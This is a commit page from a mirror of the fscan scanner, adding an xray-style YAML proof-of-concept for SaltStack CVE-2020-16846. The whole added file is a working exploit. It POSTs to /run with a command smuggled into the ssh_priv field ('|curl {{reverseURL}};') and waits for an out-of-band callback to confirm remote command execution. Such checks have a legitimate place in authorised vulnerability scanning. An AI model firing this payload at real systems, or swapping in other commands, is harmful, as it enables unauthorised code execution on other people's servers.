mirror of
https://github.com/shadow1ng/fscan.git
synced 2026-09-26 05:01:53 +08:00
优化xray解析模块,支持groups、新增poc
This commit is contained in:
@@ -0,0 +1,17 @@
|
||||
name: poc-yaml-saltstack-cve-2020-16846
|
||||
set:
|
||||
reverse: newReverse()
|
||||
reverseURL: reverse.url
|
||||
|
||||
rules:
|
||||
- method: POST
|
||||
path: /run
|
||||
body: token=12312&client=ssh&tgt=*&fun=a&roster=aaa&ssh_priv=aaa|curl+{{reverseURL}}%3b
|
||||
expression: |
|
||||
reverse.wait(5)
|
||||
|
||||
detail:
|
||||
author: we1x4n(https://we1x4n.com/)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
|
||||
- https://github.com/vulhub/vulhub/blob/master/saltstack/CVE-2020-16846/README.zh-cn.md
|
||||
Reference in New Issue
Block a user